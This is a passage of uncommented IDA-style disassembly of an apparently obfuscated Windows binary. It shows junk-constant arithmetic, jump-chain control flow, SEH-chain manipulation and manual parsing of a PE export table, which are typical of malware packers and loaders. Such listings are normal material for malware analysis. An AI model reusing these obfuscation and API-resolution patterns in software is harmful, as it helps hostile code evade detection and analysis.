loc_427266: ; CODE XREF: hjohnhn9:loc_4280AE�j
jmp loc_425B48
; END OF FUNCTION CHUNK FOR sub_425BF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42698F
loc_42726B: ; CODE XREF: sub_42698F:loc_426E55�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42698F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F85
loc_42726D: ; CODE XREF: sub_426F85+856�j
jmp loc_428150
; END OF FUNCTION CHUNK FOR sub_426F85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CCD
loc_427272: ; CODE XREF: sub_423CCD+351A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax-0Ch], 4
jnz loc_427288
add [ebp+var_8], 4
jmp loc_426996
; ---------------------------------------------------------------------------
loc_427288: ; CODE XREF: sub_423CCD+35AC�j
push offset loc_423B63
jmp nullsub_35
; END OF FUNCTION CHUNK FOR sub_423CCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_427292: ; CODE XREF: sub_427486+1744�j
jnz loc_426123
; END OF FUNCTION CHUNK FOR sub_427486
; START OF FUNCTION CHUNK FOR sub_424EC9
loc_427298: ; CODE XREF: sub_424EC9+2F61�j
jmp loc_428A28
; END OF FUNCTION CHUNK FOR sub_424EC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_42729D: ; CODE XREF: sub_424631-742�j
jmp loc_4276C5
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
xor edi, 0E9F2FF93h
and ecx, 0B476BC97h
jmp loc_426123
; ---------------------------------------------------------------------------
loc_4272B3: ; DATA XREF: sub_4245BA+E�o
mov eax, [ebp-4]
movzx eax, word ptr [eax+14h]
push edx
push 0FF219A5h
pop edx
sub edx, 1CABD1EFh
or edx, 0BDCE1D41h
jmp loc_428871
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423E64
loc_4272D3: ; CODE XREF: sub_423E64-16E�j
mov edx, esi
jmp loc_4239A2
; END OF FUNCTION CHUNK FOR sub_423E64
; ---------------------------------------------------------------------------
mov edi, 0A2291AFAh
jmp sub_428D49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_4272E4: ; CODE XREF: sub_424819+3725�j
push esi
mov esi, ebp
xchg esi, [esp+0]
mov ebp, edx
xchg ebp, [esp+0]
push esi
mov esi, ebx
jmp loc_4282C4
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
db 0BAh
dd 17B3C1CFh, 425E5A68h, 0E7D6E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_427306: ; CODE XREF: sub_425BD2:loc_425D5B�j
sub ecx, 0CBA9F7CFh
rol ecx, 15h
add ecx, 48A7B40Fh
add eax, ecx
pop ecx
mov eax, [eax]
mov esp, ebp
xchg eax, [esp+4+var_4]
jmp loc_424AB4
; END OF FUNCTION CHUNK FOR sub_425BD2
; =============== S U B R O U T I N E =======================================
sub_427324 proc near ; CODE XREF: hjohnhn9:00424CA0�p
; hjohnhn9:004280BA�j
; FUNCTION CHUNK AT 004279D7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004284AC SIZE 0000001F BYTES
xchg eax, [esp+0]
pop eax
push 75E083Dh
pop edx
xor edx, 1BF516ECh
jmp loc_4284AC
sub_427324 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_427339: ; CODE XREF: sub_426F5A:loc_427B8D�j
push 0C335D6F1h
or ebp, edx
jmp loc_423E8D
; END OF FUNCTION CHUNK FOR sub_426F5A
; =============== S U B R O U T I N E =======================================
sub_427345 proc near ; CODE XREF: sub_4249E1-B25�p
; hjohnhn9:00424140�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423571 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00424FE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042742C SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push 0C734959h
xchg ecx, [esp+0]
mov esi, ecx
jmp loc_42742C
sub_427345 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427363
loc_427358: ; CODE XREF: hjohnhn9:loc_424728�j
; sub_427363-159E�j
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_427363
; =============== S U B R O U T I N E =======================================
sub_427363 proc near ; CODE XREF: sub_423369+4�p
; FUNCTION CHUNK AT 00425DB7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004270C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427358 SIZE 0000000B BYTES
push large dword ptr fs:0
jmp loc_4270C0
sub_427363 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_42736F: ; CODE XREF: sub_427486+196E�j
sbb edx, 848BAD9h
jmp loc_4288D4
; END OF FUNCTION CHUNK FOR sub_427486
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_42737B: ; CODE XREF: sub_425029+1ABA�j
jmp loc_423AE9
; END OF FUNCTION CHUNK FOR sub_425029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427BCE
loc_427380: ; CODE XREF: sub_427BCE+13�j
jnz loc_42377B
jmp loc_426EFE
; END OF FUNCTION CHUNK FOR sub_427BCE
; ---------------------------------------------------------------------------
sbb eax, edx
jmp sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4264CF
loc_427392: ; CODE XREF: sub_4264CF:loc_4264DE�j
call sub_426B29
mov edx, [ebp-8]
mov eax, [ebp-4]
call nullsub_3
jmp loc_426809
; END OF FUNCTION CHUNK FOR sub_4264CF
; ---------------------------------------------------------------------------
cmp ebp, 161BC831h
jmp loc_4290C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_4273B2: ; CODE XREF: sub_42304F+6�j
; sub_42304F+11D2�j ...
jno loc_4273D0
or eax, eax
jz loc_427112
cmp eax, 0FFFFFFFFh
jz loc_427112
mov eax, [eax]
jmp loc_426AE9
; ---------------------------------------------------------------------------
loc_4273D0: ; CODE XREF: sub_42304F:loc_4273B2�j
or eax, eax
jz loc_427112
jmp loc_4237EA
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
loc_4273DD: ; CODE XREF: hjohnhn9:00427F54�j
xor ebx, 9950C18Ch
or edi, 9DF68B53h
jmp loc_428B98
; ---------------------------------------------------------------------------
loc_4273EE: ; CODE XREF: hjohnhn9:004248A1�j
adc edx, 0F634EFE5h
pop ebx
; START OF FUNCTION CHUNK FOR sub_424819
loc_4273F5: ; CODE XREF: sub_424819:loc_42488B�j
add ebx, 0FD77EFFEh
xchg ebx, [esp-4+arg_0]
push eax
lea eax, loc_428A04
jmp loc_426EC4
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_42740A: ; CODE XREF: sub_4278EC-34EC�j
mov edx, ds:dword_423944
imul byte ptr [edx]
push offset loc_427C31
jmp loc_42434F
; END OF FUNCTION CHUNK FOR sub_4278EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B97
loc_42741C: ; CODE XREF: sub_424B97+3727�j
pushf
sub ebx, edx
popf
loc_427420: ; CODE XREF: sub_424B97+371B�j
add edx, 2CDA0D3Dh
mov edx, [edx]
xchg edx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_424B97
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427345
loc_42742C: ; CODE XREF: sub_427345+E�j
jmp loc_423571
; END OF FUNCTION CHUNK FOR sub_427345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_427431: ; CODE XREF: sub_4260BD+E36�j
jmp loc_423A50
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_427436: ; CODE XREF: sub_426A78-B44�j
jmp loc_423217
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_42743B: ; CODE XREF: sub_42355C+10�j
jmp loc_42607D
; END OF FUNCTION CHUNK FOR sub_42355C
; =============== S U B R O U T I N E =======================================
sub_427440 proc near ; DATA XREF: sub_423E64:loc_4239A6�o
push dword ptr [ebp+10h]
push edx
call sub_423BC3
sub_427440 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_427449: ; CODE XREF: sub_423CDB+2E3E�j
jmp loc_42407B
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240E6
loc_42744E: ; CODE XREF: sub_4240E6:loc_428AFF�j
push offset loc_4280BF
jmp nullsub_118
; END OF FUNCTION CHUNK FOR sub_4240E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D02
loc_427458: ; CODE XREF: sub_426D02:loc_428F06�j
jz loc_425AFC
jmp loc_425B43
; END OF FUNCTION CHUNK FOR sub_426D02
; =============== S U B R O U T I N E =======================================
sub_427463 proc near ; CODE XREF: hjohnhn9:004271D5�j
; sub_4242A0:loc_427877�p
xchg ecx, [esp+0]
pop ecx
push eax
call sub_423425
mov [ebp-4], eax
jmp loc_423415
sub_427463 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E85
loc_427475: ; CODE XREF: sub_427E85+4�j
lea eax, [ebp-125h]
jmp loc_426E75
; END OF FUNCTION CHUNK FOR sub_427E85
; ---------------------------------------------------------------------------
loc_427480: ; CODE XREF: hjohnhn9:00423C3F�j
jg loc_423640
; =============== S U B R O U T I N E =======================================
sub_427486 proc near ; CODE XREF: sub_4264CF+A�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423246 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D52 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424E94 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425D38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426123 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004263D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004271F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042721D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427292 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042736F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427921 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428004 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042850B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004288D4 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00428B1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428BC1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428DEE SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
or eax, eax
jmp loc_425D38
sub_427486 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_427491: ; CODE XREF: sub_42363F+1553�j
jo loc_425215
and edx, ebx
jp loc_424067
jmp loc_424FB4
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
loc_4274A4: ; CODE XREF: hjohnhn9:00423D9C�j
add eax, 381617F7h
add eax, ebp
push ecx
loc_4274AD: ; CODE XREF: hjohnhn9:00427C39�j
push 332398CDh
sub ecx, ebx
jmp loc_425DF2
; ---------------------------------------------------------------------------
or ecx, 87CFD7Ch
or ebp, 0ECC13577h
jmp sub_42698F
; ---------------------------------------------------------------------------
test edi, 0F8C6ADB3h
jmp loc_426CF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D02
loc_4274D5: ; CODE XREF: sub_426D02+1B1C�j
mov eax, [eax]
mov [ebp-4], eax
push 0E2FF0717h
loc_4274DF: ; CODE XREF: sub_424928+3D1D�j
pop eax
add eax, 86D6B987h
xor eax, 4E722E70h
add eax, 9EEA912Ah
jmp loc_42326A
; END OF FUNCTION CHUNK FOR sub_426D02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_4274F7: ; CODE XREF: sub_4244F5-13D�j
push edx
push eax
; END OF FUNCTION CHUNK FOR sub_4244F5
; START OF FUNCTION CHUNK FOR sub_42304F
loc_4274F9: ; CODE XREF: sub_42304F+19E5�j
mov eax, [ebp-18h]
add eax, eax
cdq
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
add esp, 8
jmp loc_426EF9
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
loc_42750E: ; CODE XREF: hjohnhn9:004234C5�j
; hjohnhn9:loc_427989�j
call sub_424877
push 0B191C15Dh
pop edx
add edx, 2896EF22h
or edx, 0EDE0DF48h
add edx, 0B259B4B7h
call sub_4279ED
jmp loc_425CDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_427535: ; CODE XREF: sub_42325E+1FBD�j
pop ebx
xor ebx, 0A02794A4h
jns loc_4269A0
not ecx
test ebx, 0D8609567h
jmp loc_4231D4
; END OF FUNCTION CHUNK FOR sub_42325E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_427550: ; CODE XREF: sub_423F65+104A�j
jmp loc_428287
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_427555: ; CODE XREF: sub_4231AD+4�j
; sub_4231AD+1B47�j ...
mov al, 1
jmp loc_424CFC
; END OF FUNCTION CHUNK FOR sub_4231AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424564
loc_42755C: ; CODE XREF: sub_424564+8AF�j
; sub_424564+1EA6�j
inc [ebp+var_4]
jmp loc_42456D
; END OF FUNCTION CHUNK FOR sub_424564
; =============== S U B R O U T I N E =======================================
sub_427564 proc near ; CODE XREF: sub_424D38:loc_428AAC�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423A98 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00423D06 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004245D2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424AB9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00425CE7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426FE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427D81 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042825D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428906 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428B22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042901D SIZE 00000005 BYTES
call sub_423369
loc_427569: ; CODE XREF: sub_423548:loc_423551�j
test al, al
loc_42756B: ; CODE XREF: hjohnhn9:0042489B�j
jz loc_424AB9
jmp loc_426FE9
sub_427564 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shr edi, 0Eh
jmp sub_4230E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_42757E: ; CODE XREF: sub_4287BF+8BF�j
mov eax, [eax]
add eax, [ebp-4]
jmp loc_428888
; ---------------------------------------------------------------------------
loc_427588: ; CODE XREF: sub_4287BF:loc_4287D2�j
mov eax, [ebp-4]
call sub_428436
test al, al
jnz loc_4268DB
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jmp loc_42318D
; END OF FUNCTION CHUNK FOR sub_4287BF
; =============== S U B R O U T I N E =======================================
sub_4275A3 proc near ; CODE XREF: sub_42911C�j
; DATA XREF: sub_427C9B:loc_429112�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004231A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425CD0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426134 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042686B SIZE 00000005 BYTES
lea eax, [ebp-14h]
push eax
push ecx
mov ecx, ebx
xchg ecx, [esp+0]
jmp loc_42686B
sub_4275A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4275B2 proc near ; CODE XREF: hjohnhn9:00423875�j
; hjohnhn9:00427E9C�p
; FUNCTION CHUNK AT 0042471E SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
call sub_424AAE
xor ebx, eax
mov [ebp-8], ebx
push offset sub_426475
jmp loc_42471E
sub_4275B2 endp
; ---------------------------------------------------------------------------
loc_4275CA: ; CODE XREF: hjohnhn9:00425F10�j
or edi, ebp
push edi
add edi, edx
shl ecx, 16h
; START OF FUNCTION CHUNK FOR sub_426354
loc_4275D2: ; CODE XREF: sub_426354:loc_425F00�j
or ecx, 0A4320A8Ah
and ecx, 3F6B5DA7h
jmp loc_4287E0
; END OF FUNCTION CHUNK FOR sub_426354
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F90
loc_4275E4: ; CODE XREF: sub_427F90+F�j
jmp loc_428F6C
; END OF FUNCTION CHUNK FOR sub_427F90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4275E9: ; CODE XREF: sub_423B05+168�j
jmp loc_4285EB
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_4275EE: ; CODE XREF: sub_423F65+D�j
jnz loc_424F91
jmp loc_4252A4
; END OF FUNCTION CHUNK FOR sub_423F65
; =============== S U B R O U T I N E =======================================
sub_4275F9 proc near ; DATA XREF: hjohnhn9:loc_429089�o
var_4 = dword ptr -4
add eax, 9A703663h
add eax, ebp
add eax, 36415E00h
mov eax, [eax]
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
push offset sub_423444
jmp loc_4251E1
sub_4275F9 endp
; ---------------------------------------------------------------------------
loc_427619: ; DATA XREF: sub_426B29+126A�o
mov [ebp-0Ah], al
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_42761C: ; CODE XREF: sub_4262C5:loc_427C2C�j
jz loc_42389B
mov eax, [ebp-4]
cmp byte ptr [eax], 0
call sub_428447
loc_42762D: ; CODE XREF: sub_428945+7�j
jmp loc_423288
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428249
loc_427632: ; CODE XREF: sub_428249+5�j
jmp loc_425BD8
; END OF FUNCTION CHUNK FOR sub_428249
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_427637: ; CODE XREF: sub_424A78:loc_42380B�j
xchg ebx, [esp-4+arg_0]
mov ebp, ebx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_42763E: ; CODE XREF: sub_4260BD-173D�j
cmp dword ptr [ebp-8], 0
jge loc_426D9D
jmp loc_424A12
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270CF
loc_42764D: ; CODE XREF: sub_4270CF+9�j
mov edx, ecx
xchg edx, [esp+4+var_4]
call sub_423B05
; END OF FUNCTION CHUNK FOR sub_4270CF
; START OF FUNCTION CHUNK FOR sub_424698
loc_427657: ; CODE XREF: sub_424698+1B4E�j
jmp loc_427CFC
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426211
loc_42765C: ; CODE XREF: sub_426211-1CD4�j
jmp nullsub_106
; END OF FUNCTION CHUNK FOR sub_426211
; ---------------------------------------------------------------------------
loc_427661: ; DATA XREF: sub_427486-272E�o
popf
xchg eax, [esp]
jmp sub_4279ED
; ---------------------------------------------------------------------------
loc_42766A: ; DATA XREF: sub_427C9B-2D20�o
push edi
push 2E5D284Bh
pop edi
rol edi, 1Ch
xor edi, 205893AEh
rol edi, 1
add edi, 0DAC7B922h
xchg edi, [esp]
jmp loc_4239E7
; ---------------------------------------------------------------------------
loc_42768A: ; DATA XREF: sub_4282F8:loc_425BC8�o
pop ecx
mov edx, [ebp+8]
imul dword ptr [edx-4]
push offset sub_425D47
jmp loc_425D60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240AE
loc_42769B: ; CODE XREF: sub_4240AE+2D1C�j
add esi, 0DD664860h
or esi, 104BE9C1h
add esi, 0A9F64686h
xchg esi, [esp+8+var_8]
jmp sub_426708
; END OF FUNCTION CHUNK FOR sub_4240AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424831
loc_4276B6: ; CODE XREF: sub_424831+19�j
jmp loc_424405
; END OF FUNCTION CHUNK FOR sub_424831
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A28
loc_4276BB: ; CODE XREF: sub_424A28-1FC�j
jmp loc_4289C5
; END OF FUNCTION CHUNK FOR sub_424A28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_4276C0: ; CODE XREF: sub_42325E-10A�j
jmp loc_427140
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_4276C5: ; CODE XREF: sub_424631:loc_42729D�j
push eax
cmp dword ptr [ebp-14h], 6
setz al
call sub_42392D
pop ecx
shl eax, 3
mov edx, [ebp+8]
jmp loc_428E16
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
add ebp, 0B3275500h
adc ecx, eax
jmp sub_426C09
; ---------------------------------------------------------------------------
loc_4276EB: ; DATA XREF: sub_428E98-400�o
mov ebp, [eax]
add eax, 4
mov edx, [eax]
call sub_4247F4
; START OF FUNCTION CHUNK FOR sub_42325E
loc_4276F7: ; CODE XREF: sub_42325E+BFA�j
jmp loc_423A82
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_4276FC: ; CODE XREF: sub_426A78:loc_4233C8�j
push esi
mov esi, ecx
xchg esi, [esp+4+var_4]
call sub_424819
loc_427707: ; CODE XREF: sub_42855B-5231�j
jmp loc_4250EF
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
shr ebx, 9
jmp sub_4247F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_427714: ; CODE XREF: sub_4260BD+222D�j
xor edx, 8CF583B7h
push 0FAB69B54h
jge loc_42514C
not edx
jmp loc_427947
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4230E0
loc_42772C: ; CODE XREF: sub_4230E0:loc_425D9E�j
sub ebx, 0DDEDB4E8h
add ebx, 0F671D69Ah
rol ebx, 1Fh
add ebx, 7DDFD362h
xchg ebx, [esp-4+arg_0]
jmp sub_427A36
; END OF FUNCTION CHUNK FOR sub_4230E0
; ---------------------------------------------------------------------------
loc_427749: ; CODE XREF: hjohnhn9:00427062�j
jle loc_427240
; =============== S U B R O U T I N E =======================================
sub_42774F proc near ; CODE XREF: sub_427A58:loc_423F10�p
xchg eax, [esp+0]
pop eax
call sub_426741
mov eax, [ebp-4]
mov esp, ebp
pop ebp
jmp nullsub_28
sub_42774F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427763: ; CODE XREF: hjohnhn9:0042638E�j
js loc_42872A
cdq
jl locret_424AB3
jmp loc_428AD8
; ---------------------------------------------------------------------------
loc_427775: ; CODE XREF: hjohnhn9:loc_423801�j
mov ecx, offset loc_425071
jmp loc_4232A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424377
loc_42777F: ; CODE XREF: sub_424377:loc_424E8A�j
mov [ebp-8], edx
mov [ebp-4], eax
mov edx, [ebp-8]
mov eax, [ebp-4]
jmp loc_4264DE
; END OF FUNCTION CHUNK FOR sub_424377
; ---------------------------------------------------------------------------
loc_427790: ; CODE XREF: hjohnhn9:004267A7�j
not edx
; =============== S U B R O U T I N E =======================================
sub_427792 proc near ; CODE XREF: sub_42304F:loc_424F43�p
; FUNCTION CHUNK AT 004252AF SIZE 00000012 BYTES
xchg edi, [esp+0]
pop edi
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
jmp loc_4252AF
sub_427792 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_4277A2: ; CODE XREF: sub_424631-307�j
mov eax, [ebp+8]
cmp dword ptr [eax-14h], 4
jnz loc_426619
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
jnz loc_426619
cmp dword ptr [ebp-10h], 0
jmp loc_424F09
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D0E
loc_4277C5: ; CODE XREF: sub_428D0E:loc_423B92�j
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov eax, [eax+60h]
; END OF FUNCTION CHUNK FOR sub_428D0E
; START OF FUNCTION CHUNK FOR sub_426F85
loc_4277CE: ; CODE XREF: sub_426F85+1D84�j
add eax, [ebp-4]
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
dec eax
jmp loc_42726D
; END OF FUNCTION CHUNK FOR sub_426F85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_4277E0: ; CODE XREF: sub_425BD2+3B5�j
js sub_425EA9
mov ebx, edx
loc_4277E8: ; CODE XREF: sub_425BD2:loc_428B34�j
call sub_424877
mov edx, 0D504D785h
call sub_4279ED
push ebp
mov ebp, eax
jmp loc_428CAA
; END OF FUNCTION CHUNK FOR sub_425BD2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_427800: ; CODE XREF: sub_424A78+1B6�j
jmp sub_427FCE
; END OF FUNCTION CHUNK FOR sub_424A78
; =============== S U B R O U T I N E =======================================
sub_427805 proc near ; DATA XREF: sub_426354+5E8�o
jnz loc_425ED0
call sub_426098
sub_427805 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427810 proc near ; CODE XREF: hjohnhn9:0042526B�j
; sub_428D1E+B�p
; FUNCTION CHUNK AT 00426B09 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
cmp edx, 7C61090Eh
loc_42781A: ; CODE XREF: sub_42304F:loc_4282D3�j
jz loc_4243F2
jmp loc_426B09
sub_427810 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_427825: ; CODE XREF: sub_423BC3+2EC9�j
jns loc_425F6E
loc_42782B: ; CODE XREF: sub_423BC3:loc_4236BB�j
add edx, 0E53F644Bh
add edx, ebp
add edx, 984AE1Fh
jmp loc_424C7B
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
loc_42783E: ; CODE XREF: hjohnhn9:loc_42430F�j
xchg ebx, [esp]
mov eax, ebx
and ebx, edi
jmp loc_4290F1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426961
loc_42784B: ; CODE XREF: sub_426961+16�j
jmp loc_4278A0
; END OF FUNCTION CHUNK FOR sub_426961
; ---------------------------------------------------------------------------
loc_427850: ; CODE XREF: hjohnhn9:0042620C�j
xchg eax, ebp
; =============== S U B R O U T I N E =======================================
sub_427852 proc near ; CODE XREF: sub_428271-16E4�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00424064 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004242E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425F3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426AA2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427F82 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042823F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428319 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00428883 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428EF2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428F16 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
adc edx, [esp+4]
jmp loc_425F3A
